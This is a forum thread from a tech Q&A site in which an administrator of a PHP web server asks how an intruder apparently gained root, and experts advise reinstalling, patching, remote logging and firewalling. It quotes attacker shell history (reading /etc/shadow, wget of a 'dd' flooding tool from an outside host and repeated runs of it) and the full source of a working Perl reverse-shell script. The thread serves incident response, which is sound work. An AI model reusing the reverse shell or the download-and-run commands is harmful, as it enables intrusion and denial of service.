Linux: Possible root vulnerability, through url code injection

TSHAW
TSHAW used Ask the Experts™
on
Hello, I've searched my question and I found something similar in the ID: 21727726. But I have an extra problem. The hacker didn't just copy the "back" file to the /tmp directory but also, I found in the /root/.bash_history the following set of commands that I didn't introduce in any terminal of my server:

ifconfig
ifconfig -all
ifconfig ?
ifconfig --help
man ifconfig
id
cd /etc
ls -la
cd yum
ls -la
cat /etc/shadow
wget http://ddmalfa.cz/_adm/dd
chmod 777 dd
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128

Apparently the hacker accessed my server as root (since it is the only way he could possibly ran the commands in a superuser terminal) and ran that set of commands, including the download of the dd script; I'm sure he didn't accessed by putting the correct password, because he didn't changed it and I've already search in the logs for ssh failures. I'm attaching the screenshot of the dd script code. If you need it I can send it to you.

We first noticed the attack because our site just became unreachable and even through the FW we didn't reach the servers. When I first accesed the server (fisically) I just saw the "dd" process running with the 100% of the CPU, so I proceeded to kill it. After that the server got normal and so the FW.

So my question:  
1.- Is he really accessed my server as root?
2.- If it is so,  what do I have to do to protect it?


Thank you in advance
"back" code:
 
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

Open in new window

DDOS.doc
Comment
Watch Question

Do more with

Expert Office
EXPERT OFFICE® is a registered trademark of EXPERTS EXCHANGE®
do you probably have vulnerable web applications on that server?
Top Expert 2009
Commented:
Whats this SErver for ?? webserver ??

First off all, i will tell you to Remove this server from production, Break it and the install new OS again.

Cause : when some one entered to the server ( by any how) they might open some back door, so even though if you delete those file, still it will be infected again.


"I'm sure he didn't accessed by putting the correct password, because he didn't changed it and I've already search in the logs for ssh failures"

thats true. they dont have to change the password!! they can put some hidden script and it will make an open door for him to come any time!! and if a server is hacked, /var/log/secure log is useless,because thats the place they will hack first, and they will delete any entry related to their hacking...

if you use syslog server to remotely copy all the log to another server then you could of notice if it has been accessed by some one or  not. other then that its just useless.


1. Reinstall your server.
2. Put all the data from BAckup but make sure those backup is not tampered by one 1
3. Use strong firewall to protect your server
4. Use iptables and only allow certain traifq to your server
5. use portsentry ( a free but really good software) to secure your server from IDS
6. use fail2 ban
7. If this server is webserver, dont allow direct trafiq to this server, use a reverse proxy and then from reverse proxy allow http connection to thsi server
8. use mod security to protect your apache
9 Make sure apache is not running as root user..


this are the basic. thing you can do if you dont want to pay for paid security software...





> 1. Reinstall your server.
FULL ACK
:)



> 8. use mod security to protect your apache
hmm, mod_security can protect you application, but it can protect apapche only partially
remember that mod_security is a module inside apache
HTML5 and CSS3 Fundamentals

Build a website from the ground up by first learning the fundamentals of HTML5 and CSS3, the two popular programming languages used to present content online. HTML deals with fonts, colors, graphics, and hyperlinks, while CSS describes how HTML elements are to be displayed.

Author

Commented:
1.- This server is a Webserver (web application)
2.- This server is behind a Juniper Netscreen FireWall, all the ports are protected the only one that is open is the 80 and it's redirected to the server through a VIP service
3.- The servers are not direct reachable from ssh, ftp or telnet from the internet. I have a VPN from my office to administrate them, with local ip addresses.
4.- Apache is not running as root.

I think that it is difficult to access direct to the server considering the above. So maybe the hacker really accessed my server through some vulnerability of the web appl, iisn't it?
if your server (httpd process)  is not running as root, and the default server (that part which is serverd as user root) is not accessable, then there're only 2 possibilities left:
  1. the web server (apache httpd here) itself has a vulnerability
  2. any of the applications uses/calls an external program which can get root access

Do you have any hints in your access_log or error_log?
Top Expert 2009

Commented:
The scenerio you saying, then its looks like its done via web server...

what kind of website is your server holding ?? does any website require to play with Linux file system or some thing like that ??
what i meant is, does any website has any ability to modify Linux file system for any kind of purpose.. or anything ..


is your apache is up2date ?? is your Linux server up2date ??

Author

Commented:
ahoffmann:

1.- The apache child processes are running as nobody but indeed the default server is running as root. So what do I have to do to be sure this default server (root running) is not accesable .
2.- I've already looked at the access_log and error_log and I didn't see anything wrong.

fosiul01:

1.- My web site is an AVL (automatic vehicle location) developed in php. As far as I can remember there is'nt any part of the website that access Linux file system. I indeed have some php scripts that run over cli but those scripts are not accesable from web (these php scripts do play with Linux file system).
2.- We are now updating apache and linux right now (to tell you the truth we didn't update them for a while).

note: We just decided to run apache in a higher port  ( 1030 ) so the FW do the translation from the 80 to the 1030 and to use a user called "webserver" to run apache. What do you think?
Top Expert 2009

Commented:
update both Apache and linux ( but REinstall first) dont update the same server. Reinstall totaly then install again.

Put firewall .. install modsecuiry, Now a days , most company using mod security for apache level firewall

also use Reverse proxy concept , it will save 90% to hack your main server ....

also, Since you have been hacked onecE!! keep all your log to a different server. which cant be accessible from outside . if any incident happended you will know how this happended.

as i said, hacker first thing they do is , delete all the offensive log from compromised server
I feel sorry for TSHAW and this certainly seems to be a hard lesson..
Adding to the experts here,
If you are hacked once, you are going to be hacked again. So you have to be prepared. Before sending the server to production, do a vulnerability scan on the server (you can use Web Inspect or Nikto, there are lots out there)
Once done along with the experts suggestions - deploy. A syslog server also would help so that you webserver can direct its logs to it.

Do more with

Expert Office
Submit tech questions to Ask the Experts™ at any time to receive solutions, advice, and new ideas from leading industry professionals.

Start 7-Day Free Trial